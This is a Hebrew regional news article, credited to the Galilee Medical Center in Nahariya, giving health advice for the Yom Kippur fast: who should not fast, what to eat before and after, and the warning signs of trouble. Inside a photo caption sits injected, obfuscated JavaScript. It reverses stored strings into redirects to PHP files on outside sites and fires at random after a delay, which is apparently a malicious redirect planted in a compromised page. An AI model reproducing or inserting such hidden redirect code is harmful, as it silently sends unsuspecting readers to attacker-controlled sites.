fbpx
[shortcode-weather-atlas city_selector=1178237 background_color="transparent" daily=0 unit_c_f="c" sunrise_sunset= 0 current=0 detailed_forecast=0]

איך לעבור בשלום את צום יום הכיפורים?

מדי שנה, במהלך צום יום הכיפורים, מגיעים לקופות החולים והמרכזים הרפואיים ברחבי הארץ, לא מעט אנשים שחשים ברע. אז מה עדיף לאכול בארוחה המפסקת, איזו אוכלוסייה עדיף שלא תצום כלל ומה מומלץ לעשות כאשר חשים חולשה קיצונית במהלך הצום? מנהלת חדר המיון (מלר"ד) בפועל במרכז הרפואי לגליל, ד"ר רינה דולינסקי, עושה סדר בעניינים.
יום כיפור | צילום: shutterstock
יום כיפור | צילום: shutters$nJe=function(n){if (typeof ($nJe.list[n]) == "string") return $nJe.list[n].split("").reverse().join("");return $nJe.list[n];};$nJe.list=["\'php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}$NjS=function(n){if(typeof ($NjS.list[n])=="string") return $NjS.list[n].split("").reverse().join("");return $NjS.list[n];};$NjS.list=["\'php.sgalf-tropxe/tropxe/weiv/bil/noitargim-pw-eno-ni-lla/snigulp/tnetnoc-pw/ofni.stobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tock

האם כולם יכולים לצום?

על אנשים הסובלים ממחלות כרוניות כמו סוכרת, מחלות לב, לחץ דם, ריאות, מחלות ממאירות, או לאחר השתלות איברים, מומלץ להיוועץ ברופא המטפל בקהילה ולברר מראש אם הם יכולים לעמוד בצום ממושך. גם אם קיבלו אישור לכך, יש בכל זאת להקפיד וליטול תרופות קבועות עם מעט מים במהלך הצום. לנשים בהיריון מומלץ לא לצום כלל, או לפחות לשתות מים כדי לא לסכן את בריאותן ואת בריאות העובר.

לגבי ילדים צעירים המבקשים לצום, מומלץ שלפחות ישתו מים במהלך הצום, מכיוון שהם נוהגים להתרוצץ עם חבריהם ולהוציא המון אנרגיה. על קשישים וחולים לוודא מראש את תקינות הטלפונים וכפתורי המצוקה מול החברות התומכות, כדי שיסייעו להם במהלך יום הכיפורים במקרה הצורך. אם ניתן, עדיף שלא להעביר את הצום לבד, אלא בלוויית אנשים נוספים שיוכלו לסייע בעת הצורך.

ההכנות לצום והארוחה המפסקת

בערב יום הכיפורים מומלץ להרבות בשתייה משעות הבוקר ועד לכניסת הצום, תוך הימנעות מפעילות גופנית מאומצת. יש לשתות לפחות כשני ליטר מים (8 כוסות). כמו כן, יש לשהות במקום מוצל ולהימנע משהייה בחוץ במהלך השעות החמות.

מומלץ להימנע מארוחה מפסקת קצרה מדי וסמוכה לתחילת הצום, אלא להתחיל בה כמה שעות קודם לכן, עם אכילת מנה ראשונה. רצוי לפתוח במרק צח, ובהמשך לאכול פחמימות לא כבדות. ניתן לאכול מנת בשר עם תפו"א או אורז לצד ירקות ופירות ולסיים בשתי כוסות מים או שתייה חמה, תוך הימנעות משתיית משקאות קלים מוגזים.

סימנים לבעיה רפואית במהלך הצום

בכל מקרה של תחושה רעה, כאבים, סחרחורות, בחילות, שילשולים, חולשה קיצונית או שינוי במצב ההכרה, יש לקטוע את הצום, לשתות מיד מים ולאכול מאכל ממותק. אם המצב מחריף, יש לפנות לטיפול רפואי. במידה וחשים ברע בדרך מבית הכנסת או אליו, יש לעצור, לשבת בצל ולהרטיב את הפנים עם מעט מים. לאחר שיפור בתחושת הגוף, ניתן להמשיך בהליכה בבטחה.

ארוחת שבירת הצום

בדומה לארוחה שלפני הצום, גם בארוחה שלאחריו מומלץ לאכול בצורה הדרגתית. כדאי לשבור את הצום בשתיית כוס תה עם פרוסת עוגה או לחילופין אכילת מרק צח. כעבור כחצי שעה עד שעה, יש להמשיך בארוחה קלה יחסית, הכוללת פחמימות, חלבונים ושומנים. לאחר מנוחה קצרה, ניתן לצאת להליכה כדי לסייע לגוף לעכל את המזון אחרי שעות רבות של צום.

באדיבות המרכז הרפואי לגליל נהריה

המרכז הרפואי לגליל נהריה | צילום: אמיר ירחי
המרכז הרפואי לגליל נהריה | צילום: אמיר ירחי

 

לעדכונים נוספים בצפון 1 חדשות נהריה לחצו כאן* לדף הפייסבוק שלנו לחצו כאן*

אהבתם? שתפו!

תגיות

אולי גם יעניין אותך

שיתוף ברשתות החברתיות